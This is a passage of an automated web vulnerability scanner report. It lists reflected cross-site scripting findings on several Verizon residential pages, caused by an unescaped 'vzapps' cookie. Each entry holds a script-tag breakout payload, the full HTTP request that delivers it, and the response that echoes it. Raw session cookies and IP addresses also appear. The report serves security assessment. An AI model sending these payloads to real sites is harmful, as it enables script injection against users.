UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX8e2e1'><script>alert(1)</script>1e4a8a0e625; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 104008
Expires: Sat, 20 Nov 2010 03:20:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:20:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX8e2e1'><script>alert(1)</script>1e4a8a0e625; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8E2E1'><SCRIPT>ALERT(1)</SCRIPT>1E4A8A0E625 ' />
...[SNIP]...

2.924. http://www22.verizon.com/Residential/HighspeedInternet/FAQ/FAQ.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HighspeedInternet/FAQ/FAQ.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4dbaa'><script>alert(1)</script>f9ec6948bd6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HighspeedInternet/FAQ/FAQ.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4dbaa'><script>alert(1)</script>f9ec6948bd6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 104007
Expires: Sat, 20 Nov 2010 00:10:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX4dbaa'><script>alert(1)</script>f9ec6948bd6; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | High Speed Internet: FAQs
</title><meta name="keywords" content="verizon high speed internet faqs, verizon dsl faqs, verizon faqs, verizon
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4DBAA'><SCRIPT>ALERT(1)</SCRIPT>F9EC6948BD6 ' />
...[SNIP]...

2.925. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5be15'><script>alert(1)</script>3c4e8eb8b2a was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX5be15'><script>alert(1)</script>3c4e8eb8b2a; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 199728
Expires: Sat, 20 Nov 2010 00:09:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:09:30 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:09:30 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX5BE15'><SCRIPT>ALERT(1)</SCRIPT>3C4E8EB8B2A ' />
...[SNIP]...

2.926. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8c400'><script>alert(1)</script>5e2533e5388 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8c400'><script>alert(1)</script>5e2533e5388; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 199734
Expires: Sat, 20 Nov 2010 00:10:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:20 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/
Set-Cookie: ContextInfo_State=; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:10:20 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8C400'><SCRIPT>ALERT(1)</SCRIPT>5E2533E5388 ' />
...[SNIP]...

2.927. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 70270'><script>alert(1)</script>55b92e6b12d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/Features/Features.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX70270'><script>alert(1)</script>55b92e6b12d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 307358
Expires: Sat, 20 Nov 2010 00:12:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:12 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX70270'><script>alert(1)</script>55b92e6b12d; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:12 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX70270'><SCRIPT>ALERT(1)</SCRIPT>55B92E6B12D ' />
...[SNIP]...

2.928. http://www22.verizon.com/Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2fb11'><script>alert(1)</script>c9082fb4a68 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/HomePhone/FiOSDigitalVoice/HowItWorks/HowItWorks.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX2fb11'><script>alert(1)</script>c9082fb4a68; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 202319
Expires: Sat, 20 Nov 2010 00:16:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:03 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/
Set-Cookie: ContextInfo_State=TX2fb11'><script>alert(1)</script>c9082fb4a68; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:16:03 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX2FB11'><SCRIPT>ALERT(1)</SCRIPT>C9082FB4A68 ' />
...[SNIP]...

2.929. http://www22.verizon.com/Residential/Internet/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Internet/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18609'><script>alert(1)</script>38eb9406858 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Internet/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX18609'><script>alert(1)</script>38eb9406858; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73121
Expires: Sat, 20 Nov 2010 00:10:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:10:11 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX18609'><script>alert(1)</script>38eb9406858; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX18609'><SCRIPT>ALERT(1)</SCRIPT>38EB9406858 ' />
...[SNIP]...

2.930. http://www22.verizon.com/Residential/Services/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Services/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a33c2'><script>alert(1)</script>e9e9cf39ae6 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXa33c2'><script>alert(1)</script>e9e9cf39ae6; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 55449
Expires: Sat, 20 Nov 2010 00:16:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXa33c2'><script>alert(1)</script>e9e9cf39ae6; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet | Essential Services
</title><meta name="keyword" content="verizon internet security, online backup, online sharing, file sharing
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXA33C2'><SCRIPT>ALERT(1)</SCRIPT>E9E9CF39AE6 ' />
...[SNIP]...

2.931. http://www22.verizon.com/Residential/Services/BackupandSharing/BackupandSharing.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Services/BackupandSharing/BackupandSharing.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2a62'><script>alert(1)</script>712158990f3 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/BackupandSharing/BackupandSharing.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXd2a62'><script>alert(1)</script>712158990f3; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 60755
Expires: Sat, 20 Nov 2010 00:16:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:09 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXd2a62'><script>alert(1)</script>712158990f3; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Essential Services: Backup and Sharing
</title><meta name="keywords" content="back up pc, backup pc, pc backup, back up Mac, back up Macin
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD2A62'><SCRIPT>ALERT(1)</SCRIPT>712158990F3 ' />
...[SNIP]...

2.932. http://www22.verizon.com/Residential/Services/SecuritySuite/SecuritySuite.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Services/SecuritySuite/SecuritySuite.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7daef'><script>alert(1)</script>c934f3f7b2c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/SecuritySuite/SecuritySuite.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX7daef'><script>alert(1)</script>c934f3f7b2c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64651
Expires: Sat, 20 Nov 2010 00:16:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:17 GMT
Connection: close
Set-Cookie: ContextInfo_State=TX7daef'><script>alert(1)</script>c934f3f7b2c; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Essential Services: Internet Security Suite
</title><meta name="keywords" description="anti-virus, firewall, anti-spyware, internet parent
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7DAEF'><SCRIPT>ALERT(1)</SCRIPT>C934F3F7B2C ' />
...[SNIP]...

2.933. http://www22.verizon.com/Residential/Services/TechnicalSupport/TechnicalSupport.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/Services/TechnicalSupport/TechnicalSupport.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5db1'><script>alert(1)</script>7ef783c9f97 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/Services/TechnicalSupport/TechnicalSupport.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
